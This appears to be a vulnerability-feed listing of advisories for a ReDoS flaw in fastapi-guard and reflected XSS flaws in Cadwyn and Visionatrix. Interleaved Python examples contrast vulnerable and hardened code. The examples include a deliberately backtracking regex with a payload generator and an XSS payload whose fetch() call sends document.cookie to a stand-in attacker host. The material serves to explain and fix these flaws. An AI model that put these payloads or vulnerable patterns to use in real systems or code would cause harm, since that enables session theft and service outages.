Positive Technologies
added 2025/07/23 12:00 a.m.

PT-2025-30607 · Unknown · Fastapi Guard

Name of the Vulnerable Software and Affected Versions: fastapi-guard versions 3.0.1
Description: The regular expression patch intended to mitigate a ReDoS vulnerability failed to adequately limit input string length. Specifically, the patch did not account for cases where the attributes within a...

CVSS 8.8 · AI score 6.2 · EPSS 0.00734
Exploits 1 · References 10
PyPA
added 2025/07/21 9:15 p.m.

PYSEC-2025-71

Cadwyn creates production-ready community-driven modern Stripe-like API versioning in FastAPI. In versions before 5.4.3, the version parameter of the "/docs" endpoint is vulnerable to a Reflected XSS Cross-Site Scripting attack. This XSS would notably allow an attacker to execute JavaScript code ...

CVSS 7.6 · AI score 6.8 · EPSS 0.00244
Exploits 0 · References 2 · Affected software 1
NVD
added 2025/07/21 9:15 p.m.

CVE-2025-53528

Cadwyn creates production-ready community-driven modern Stripe-like API versioning in FastAPI. In versions before 5.4.3, the version parameter of the "/docs" endpoint is vulnerable to a Reflected XSS Cross-Site Scripting attack. This XSS would notably allow an attacker to execute JavaScript code ...

CVSS 7.6 · EPSS 0.00244
Exploits 0 · References 2
CVE
added 2025/07/21 8:15 p.m.

CVE-2025-53528

Cadwyn (FastAPI-based API versioning tool) is affected by CVE-2025-53528 due to a Reflected XSS vulnerability in the version parameter of the /docs endpoint. The issue allows an attacker to execute JavaScript in a user’s session via a crafted link. The vulnerability is fixed in version 5.4.3; rem...

CVSS 7.6 · AI score 5.8 · EPSS 0.00244
Exploits 0 · References 2
Cvelist
added 2025/07/21 8:15 p.m.

CVE-2025-53528 Cadwyn is vulnerable to an XSS attack through its docs page

Cadwyn creates production-ready community-driven modern Stripe-like API versioning in FastAPI. In versions before 5.4.3, the version parameter of the "/docs" endpoint is vulnerable to a Reflected XSS Cross-Site Scripting attack. This XSS would notably allow an attacker to execute JavaScript code ...

CVSS 7.6 · EPSS 0.00244
Exploits 0 · References 2
RedhatCVE
added 2025/07/09 7:23 p.m.

CVE-2025-53539

FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. fastapi-guard's penetration attempts detection uses regex to scan incoming requests. However, some of the regex patterns used in detection are extremely...

CVSS 6.9 · AI score 7.1 · EPSS 0.00422
Exploits 1 · References 1
BDU FSTEC
added 2025/07/09 12:00 a.m.

Vulnerability in the fastapi-guard network traffic analysis, detection and response tool: use of a regular expression with inefficient computational complexity allows attackers to cause a denial of service.

The vulnerability in the fastapi-guard network traffic analysis, detection and response tool is related to the use of a regular expression with inefficient computational complexity. Exploiting this vulnerability could allow a remote attacker to cause...

CVSS 5.3 · AI score 5.5 · EPSS 0.00422
Exploits 1 · References 2 · Affected software 1
Veracode
added 2025/07/08 8:18 a.m.

Regular Expression Denial Of Service (ReDoS)

fastapi-guard is vulnerable to Regular Expression Denial Of Service ReDoS. The vulnerability is due to inefficient regex pattern matching due to use of poorly optimized regular expressions that cause polynomial-time backtracking on crafted inputs, leading to high CPU usage and service...

CVSS 7.5 · AI score 6.2 · EPSS 0.00422
Exploits 1 · References 4 · Affected software 1
OSV
added 2025/07/07 11:36 p.m.

GHSA-J47Q-RC62-W448 fastapi-guard is vulnerable to ReDoS through inefficient regex

Summary fastapi-guard detects penetration attempts by using regex patterns to scan incoming requests. However, some of the regex patterns used in detection are extremely inefficient and can cause polynomial complexity backtracks when handling specially crafted inputs. It is not as severe as...

CVSS 6.9 · AI score 6.1 · EPSS 0.00422
Exploits 1 · References 4
Github Security Blog
added 2025/07/07 11:36 p.m.

fastapi-guard is vulnerable to ReDoS through inefficient regex

Summary fastapi-guard detects penetration attempts by using regex patterns to scan incoming requests. However, some of the regex patterns used in detection are extremely inefficient and can cause polynomial complexity backtracks when handling specially crafted inputs. It is not as severe as...

CVSS 7.5 · AI score 6.3 · EPSS 0.00422
Exploits 1 · References 4 · Affected software 1
NVD
added 2025/07/07 8:15 p.m.

CVE-2025-53539

FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. fastapi-guard's penetration attempts detection uses regex to scan incoming requests. However, some of the regex patterns used in detection are extremely...

CVSS 7.5 · EPSS 0.00422
Exploits 1 · References 2
Snyk
added 2025/07/07 7:45 p.m.

Regular Expression Denial of Service (ReDoS)

Overview fastapi-guard is a Security library for FastAPI to control IPs and more. Affected versions of this package are vulnerable to Regular Expression Denial of Service ReDoS via the SusPatternsManager class in the suspatternshandler.py file. An attacker can cause excessive resource consumption...

CVSS 7.5 · AI score 6.8 · EPSS 0.00422
Exploits 1 · References 2
OSV
added 2025/07/07 7:16 p.m.

CVE-2025-53539 ReDoS in fastapi-guard's penetration attempts detector

FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. fastapi-guard's penetration attempts detection uses regex to scan incoming requests. However, some of the regex patterns used in detection are extremely...

CVSS 6.9 · AI score 6.3 · EPSS 0.00422
Exploits 1 · References 4
CVE
added 2025/07/07 7:16 p.m.

CVE-2025-53539

CVE-2025-53539 affects fastapi-guard: the DoS risk stems from inefficient regular expressions in the SusPatternsManager (suspatterns_handler.py) used to detect penetration attempts, enabling polynomial backtracking under crafted inputs. The vulnerability is documented as fixed in version 3.0.1; r...

CVSS 7.5 · AI score 6.5 · EPSS 0.00422
Exploits 1 · References 2 · Affected software 1
Cvelist
added 2025/07/07 7:16 p.m.

CVE-2025-53539 ReDoS in fastapi-guard's penetration attempts detector

FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. fastapi-guard's penetration attempts detection uses regex to scan incoming requests. However, some of the regex patterns used in detection are extremely...

CVSS 6.9 · EPSS 0.00422
Exploits 1 · References 2
Vulnrichment
added 2025/07/07 7:16 p.m.

CVE-2025-53539 ReDoS in fastapi-guard's penetration attempts detector

FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. fastapi-guard's penetration attempts detection uses regex to scan incoming requests. However, some of the regex patterns used in detection are extremely...

CVSS 6.9 · AI score 7 · EPSS 0.00422
Exploits 1 · References 2
CNNVD
added 2025/07/07 12:00 a.m.

fastapi-guard security vulnerability

fastapi-guard is a security library for FastAPI by Renzo F Individual Developer that provides middleware to control IPs, log requests and detect penetration attempts. A security vulnerability exists in fastapi-guard versions prior to 3.0.1, which stems from a regular expression pattern inefficien...

CVSS 7.5 · AI score 6.2 · EPSS 0.00422
Exploits 1 · References 3
Positive Technologies
added 2025/07/07 12:00 a.m.

PT-2025-28250

Name of the Vulnerable Software and Affected Versions: FastAPI Guard versions prior to 3.0.1
Description: The issue concerns the penetration attempts detection mechanism in FastAPI Guard, which utilizes regex patterns to scan incoming requests. However, some of these regex patterns are inefficien...

CVSS 7.5 · AI score 6.4 · EPSS 0.00422
Exploits 1 · References 10
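The fastapi-guard entries above all describe one mechanism: a request-scanning regex whose adjacent unbounded quantifiers backtrack polynomially on crafted input, and (per PT-2025-30607) a first fix that did not cap input length adequately. The Python below is an added example, not fastapi-guard's own code or patterns: the pattern, the length cap, the payload and the timing helper are all constructed here to show the failure mode and the two-part fix, capping the input before the regex runs and rewriting the pattern so each character can be consumed in only one way.

```python
import re
import time
from typing import Optional

# Constructed detection pattern, NOT one of fastapi-guard's: it is meant to
# flag "key=" assignments in a request. Two adjacent unbounded quantifiers
# over the same character class mean that for a run of m matching characters
# with no '=' after it the engine tries every split between the two groups
# (about m^2/2 attempts) at each starting position, so an unanchored search
# over n such characters costs roughly n^3/6 steps.
VULNERABLE_PATTERN = re.compile(r"[\w.]*[\w.]*=")

# Same intent with a single quantifier: each starting position now costs at
# most the remaining length, so the worst case is bounded by the square of
# the input length, which a length cap keeps small.
HARDENED_PATTERN = re.compile(r"[\w.]*=")

# Assumed cap, not the library's value. The cap matters on its own: with the
# vulnerable pattern a few thousand characters already burn seconds of CPU,
# which is the point PT-2025-30607 makes about an incomplete length check.
MAX_SCAN_LEN = 2048


def scan_vulnerable(value: str) -> bool:
    """Detector as the advisories describe it: the regex runs on raw input."""
    return VULNERABLE_PATTERN.search(value) is not None


def scan_hardened(value: str) -> Optional[bool]:
    """Cap length before the regex runs, then use the single-quantifier pattern.

    Returns True/False for a scanned value and None when the value was refused
    because it exceeds MAX_SCAN_LEN (the caller should reject the request).
    """
    if len(value) > MAX_SCAN_LEN:
        return None
    return HARDENED_PATTERN.search(value) is not None


def redos_payload(n: int) -> str:
    """Constructed worst case: n characters the pattern can consume and no '='."""
    return "a" * n


def time_search(pattern: re.Pattern, payload: str, repeats: int = 3) -> float:
    """Best-of-N wall-clock seconds for one search, a rough cost measure."""
    best = float("inf")
    for _ in range(repeats):
        start = time.perf_counter()
        pattern.search(payload)
        best = min(best, time.perf_counter() - start)
    return best


def compare(n: int) -> tuple:
    """Seconds taken by the vulnerable and hardened patterns on redos_payload(n)."""
    payload = redos_payload(n)
    return time_search(VULNERABLE_PATTERN, payload), time_search(HARDENED_PATTERN, payload)


def vulnerable_is_slower(n: int, factor: float = 3.0) -> bool:
    """True when the vulnerable pattern takes more than `factor` times as long."""
    slow, fast = compare(n)
    return slow > factor * fast


if __name__ == "__main__":
    for n in (200, 400, 600):
        slow, fast = compare(n)
        print(f"n={n:4d}  vulnerable={slow * 1e3:8.2f} ms  hardened={fast * 1e3:8.3f} ms")
    print("oversized input refused:", scan_hardened(redos_payload(MAX_SCAN_LEN + 1)))
```

Running the block prints timings for growing payloads: the vulnerable pattern's cost grows roughly with the cube of the length, while the single-quantifier form stays in the sub-millisecond range at these sizes. Neither control is sufficient alone. A cap with a still-superlinear pattern leaves the cubic case reachable within the cap, and a rewritten pattern with no cap still lets an unbounded body consume time proportional to its square, so both belong together.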
RedhatCVE
added 2025/06/25 5:53 p.m.

CVE-2025-49126

Visionatrix is an AI Media processing tool using ComfyUI. In versions 1.5.0 to before 2.5.1, the /docs/flows endpoint is vulnerable to a Reflected XSS Cross-Site Scripting attack allowing full takeover of the application and exfiltration of secrets stored in the application. The implementation us...

CVSS 8.8 · AI score 5.9 · EPSS 0.00244
Exploits 0 · References 1
OSV
added 2025/06/23 5:18 p.m.

CVE-2025-49126 Visionatrix Vulnerable to Reflected XSS Leading to Exfiltration of Secrets

Visionatrix is an AI Media processing tool using ComfyUI. In versions 1.5.0 to before 2.5.1, the /docs/flows endpoint is vulnerable to a Reflected XSS Cross-Site Scripting attack allowing full takeover of the application and exfiltration of secrets stored in the application. The implementation us...

CVSS 8.8 · AI score 6 · EPSS 0.00244
Exploits 0 · References 4
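The Cadwyn (CVE-2025-53528) and Visionatrix (CVE-2025-49126) entries describe the same sink class: a documentation endpoint that reflects a query parameter into the HTML it returns. Both descriptions are truncated above, so the exact template either project used is not shown here. The block below is an added example with a constructed template, not code from either project; the date-style version format it allowlists, the Swagger UI snippet and the payloads are assumptions made for the illustration.

```python
import html
import json
import re
from urllib.parse import quote

# Constructed template for a "/docs" page whose `version` query parameter
# selects which OpenAPI document the UI loads. NOT Cadwyn's or Visionatrix's
# code; it only reproduces the sink class the two advisories describe.

# Assumed version format (date-style API versions). Anything else is refused.
VERSION_RE = re.compile(r"\d{4}-\d{2}-\d{2}")


def render_docs_vulnerable(version: str) -> str:
    """Reflected XSS: the parameter lands unencoded in an attribute and in a JS string."""
    return (
        "<!DOCTYPE html><html><body>\n"
        f'<div id="swagger-ui" data-version="{version}"></div>\n'
        "<script>\n"
        f"SwaggerUIBundle({{url: '/openapi.json?version={version}', dom_id: '#swagger-ui'}});\n"
        "</script></body></html>"
    )


def render_docs_hardened(version: str) -> str:
    """Allowlist the value, then encode it for each output context it is written into."""
    if VERSION_RE.fullmatch(version) is None:
        raise ValueError(f"unsupported version format: {version!r}")
    # HTML attribute context: escape &, <, >, " and '.
    attr_value = html.escape(version, quote=True)
    # JavaScript string context: percent-encode the query value and let
    # json.dumps emit a quoted, escaped JS string literal. json.dumps does not
    # escape '<' or '/', so on its own it would not stop a '</script>' breakout;
    # the allowlist above is the primary control, the encoding is defence in depth.
    openapi_url = json.dumps(f"/openapi.json?version={quote(version, safe='')}")
    return (
        "<!DOCTYPE html><html><body>\n"
        f'<div id="swagger-ui" data-version="{attr_value}"></div>\n'
        "<script>\n"
        f"SwaggerUIBundle({{url: {openapi_url}, dom_id: '#swagger-ui'}});\n"
        "</script></body></html>"
    )


# Constructed payloads: one breaks out of the attribute, one out of the JS string.
ATTRIBUTE_PAYLOAD = '"><img src=x onerror=alert(document.cookie)>'
SCRIPT_PAYLOAD = "'}); fetch('https://attacker.invalid/?c=' + document.cookie); //"


def is_reflected_unencoded(page: str, payload: str) -> bool:
    """True when the payload appears verbatim in the page, i.e. the sink is exploitable."""
    return payload in page


def hardened_rejects(version: str) -> bool:
    """True when the hardened renderer refuses the value instead of reflecting it."""
    try:
        render_docs_hardened(version)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for payload in (ATTRIBUTE_PAYLOAD, SCRIPT_PAYLOAD):
        page = render_docs_vulnerable(payload)
        print("vulnerable reflects payload:", is_reflected_unencoded(page, payload))
        print("hardened refuses payload:   ", hardened_rejects(payload))
    print(render_docs_hardened("2025-07-21"))
```

The order of the two controls is the practical point: validation against the expected shape of a version string removes the attack surface outright, and the per-context encoding covers the case where the allowlist is later loosened. Escaping with html.escape alone would not be enough for the script context if arbitrary values were accepted, which is why the value is built as a JSON string literal there rather than pasted between quotes.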